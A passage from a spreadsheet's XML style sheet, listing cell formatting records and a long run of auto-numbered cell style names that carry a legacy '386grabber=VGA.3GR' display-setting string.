    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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 fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="4"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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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 fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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5" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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 fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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 fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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pplyNumberFormat="0" applyFill="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 fillId="7"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 fillId="7"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lignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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2" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="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5" fillId="0" borderId="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5"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1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12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="4"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12"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12"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10"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10"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="12"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="12"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="4"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3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="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3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="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9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="6" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="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10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1"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5" fillId="0" borderId="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5" fillId="0" borderId="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13"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5"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5" fillId="0" borderId="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12"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12"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12"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12"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="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12"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5" fillId="0" borderId="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2"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12"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1"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="7"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 fillId="7"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 fillId="6"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5" fillId="0" borderId="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7"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9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9"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5" fillId="0" borderId="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2"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2"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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="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12"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5" fillId="0" borderId="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5" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="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5" fillId="0" borderId="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cellStyleXfs>
  <cellXfs count="71">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="7" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="9" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="9" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment shrinkToFit="1"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="9" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="176" fontId="9" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>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9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="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0" borderId="0" xfId="0" applyAlignment="1"/>
  </cellXfs>
  <cellStyles count="12710">
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_" xfId="25"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2" xfId="59"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 2" xfId="61"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 2 2" xfId="8"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 2 3" xfId="75"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 2 4" xfId="29"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 2 5" xfId="83"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 2 6" xfId="89"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 2 7" xfId="90"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 3" xfId="95"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 3 2" xfId="100"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 3 3" xfId="112"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 3 4" xfId="125"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 3 5" xfId="132"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 3 6" xfId="137"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 3 7" xfId="142"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 4" xfId="3"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 4 2" xfId="150"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 4 3" xfId="156"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 4 4" xfId="162"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 4 5" xfId="166"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 4 6" xfId="169"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 4 7" xfId="171"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 5" xfId="176"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 5 2" xfId="180"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 5 3" xfId="186"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 5 4" xfId="189"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 5 5" xfId="191"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 5 6" xfId="193"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 5 7" xfId="194"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 6" xfId="197"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 6 2" xfId="43"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 6 3" xfId="201"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 6 4" xfId="64"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 6 5" xfId="93"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 6 6" xfId="5"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 6 7" xfId="173"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 7" xfId="203"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 7 2" xfId="211"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 7 3" xfId="222"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 7 4" xfId="230"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 7 5" xfId="13"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 7 6" xfId="71"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 7 7" xfId="34"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 8" xfId="232"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 8 2" xfId="49"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 8 3" xfId="235"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 8 4" xfId="239"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 8 5" xfId="97"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 8 6" xfId="109"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 2 8 7" xfId="122"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 3" xfId="205"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 3 2" xfId="224"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 3 3" xfId="23"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 3 4" xfId="68"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 3 5" xfId="36"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 3 6" xfId="77"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 3 7" xfId="85"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 4" xfId="216"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 4 2" xfId="242"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 4 3" xfId="243"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 4 4" xfId="244"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 4 5" xfId="246"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 4 6" xfId="248"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 4 7" xfId="252"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 5" xfId="226"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 5 2" xfId="256"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 5 3" xfId="257"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 5 4" xfId="258"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 5 5" xfId="260"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 5 6" xfId="262"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 5 7" xfId="266"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 6" xfId="21"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 6 2" xfId="271"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 6 3" xfId="274"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 6 4" xfId="277"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 6 5" xfId="281"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 6 6" xfId="285"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 6 7" xfId="291"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 7" xfId="69"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 7 2" xfId="295"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 7 3" xfId="298"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 7 4" xfId="301"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 7 5" xfId="305"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 7 6" xfId="308"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 7 7" xfId="312"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 8" xfId="35"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 8 2" xfId="316"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 8 3" xfId="319"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 8 4" xfId="322"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 8 5" xfId="325"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 8 6" xfId="328"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 8 7" xfId="332"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 9" xfId="80"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 9 2" xfId="335"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 9 3" xfId="340"/>
    <cellStyle name="          _x000d__x000a_386grabber=VGA.3GR_x000d__x000a_ 9 4" xfId="345"/>
